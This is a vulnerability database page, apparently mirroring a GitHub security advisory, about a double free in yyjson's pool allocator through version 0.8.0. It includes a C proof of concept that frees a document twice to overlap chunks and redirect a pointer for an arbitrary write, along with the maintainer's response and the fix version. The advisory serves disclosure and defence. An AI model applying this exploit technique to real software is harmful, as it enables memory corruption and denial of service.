Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-whx6-m9j4-w2m2

Опубликовано: 29 фев. 2024
Источник: github
Github: Прошло ревью
CVSS4: 8.8
CVSS3: 8.6

Описание

yyjson has a Double Free vulnerability

Summary

The pool series allocator (pool_malloc/pool_free/pool_realloc) by yysjon has a Double Free vulnerability, which may lead to arbitrary address writing and Denial of Service (DoS) attacks. Arbitrary address writing, combined with other legitimate or illegitimate operations of programs using this library, can lead to remote code execution.

Details

The core cause of this vulnerability lies in the pool_free function's lack of loop checks, while the direct cause stems from the pool_free function and similar free-series functions not performing pointer destruction, resulting in Use-After-Free (UAF) vulnerabilities.

PoC

Below, a C language program using yyjson 0.8.0 is written to show how to exploit a Double Free vulnerability to cause chunk overlaps, which then allows the modification of a chunk's next pointer to point to an arbitrary address. If the targeted address is valid, modifications can be made. However, if the address is invalid, it could lead to the program crashing, which could be exploited for a Denial of Service (DoS) attack. Additionally, constructing a cyclic chain of chunks could force the service into an infinite loop, also exploitable for a DoS attack.

#include <stdio.h> #include "yyjson.h" char test[0x110]; int64_t a=0xffffffff; int64_t b= (int64_t) test; int main() { size_t max_json_size = 64 * 1024; size_t buf_size = yyjson_read_max_memory_usage(max_json_size, 0); void *buf = malloc(buf_size); yyjson_alc alc; yyjson_alc_pool_init(&alc, buf, buf_size); yyjson_mut_doc *p1 = yyjson_mut_doc_new(&alc); yyjson_mut_doc *p2 = yyjson_mut_doc_new(&alc); yyjson_mut_arr(p2); yyjson_mut_doc *p3 = yyjson_mut_doc_new(&alc); yyjson_mut_doc_free(p2); yyjson_mut_doc_free(p2); // double free yyjson_mut_doc_free(p1); yyjson_read_flag flg = YYJSON_READ_ALLOW_COMMENTS | YYJSON_READ_ALLOW_INF_AND_NAN; for(int i=0;i<0x100;i++)test[i]= 'a'; test[0x100]='\00'; char *payload_f = "[%lld,43981]"; char payload[100]; sprintf(payload,payload_f,&a); yyjson_mut_doc *p4 = yyjson_read_opts(payload,strlen(payload),flg,&alc,NULL); yyjson_mut_doc *p5 = yyjson_mut_doc_new(&alc); yyjson_mut_doc *p6 = yyjson_mut_doc_new(&alc); yyjson_mut_doc *p7 = yyjson_mut_doc_new(&alc); yyjson_mut_doc *p8 = yyjson_mut_doc_new(&alc); for(int z=1;z<=100;z++) yyjson_mut_int(p8,0x63636363); printf("%s",test); free(buf); return 0; }

Impact

What kind of vulnerability is it? Who is impacted?

Note from yyjson

yyjson_mut_doc_free() is well-documented: https://github.com/ibireme/yyjson/blob/0.8.0/src/yyjson.h#L2090-L2093

/** Release the JSON document and free the memory. After calling this function, the `doc` and all values from the `doc` are no longer available. This function will do nothing if the `doc` is NULL. */ void yyjson_mut_doc_free(yyjson_doc *doc);

If you have already called yyjson_mut_doc_free() on a doc, the doc and its internal values are invalid. Any further operation on the doc or its values is undefined behavior.

While this is not a bug in yyjson itself, a defensive patch has been provided: 0eca326 If you mistakenly call yyjson_mut_doc_free() twice on the same doc against the documentation, this patch will cause your program to crash immediately, alerting you to the incorrect usage.

Пакеты

Наименование

github.com/ibireme/yyjson

Затронутые версииВерсия исправления

< 0.9.0

0.9.0

EPSS

Процентиль: 86%
0.03059
Низкий

8.8 High

CVSS4

8.6 High

CVSS3

Дефекты

CWE-94

Связанные уязвимости

CVSS3: 8.6
nvd
почти 2 года назад

yyjson through 0.8.0 has a double free, leading to remote code execution in some cases, because the pool_free function lacks loop checks. (pool_free is part of the pool series allocator, along with pool_malloc and pool_realloc.)

CVSS3: 8.6
debian
почти 2 года назад

yyjson through 0.8.0 has a double free, leading to remote code executi ...

EPSS

Процентиль: 86%
0.03059
Низкий

8.8 High

CVSS4

8.6 High

CVSS3

Дефекты

CWE-94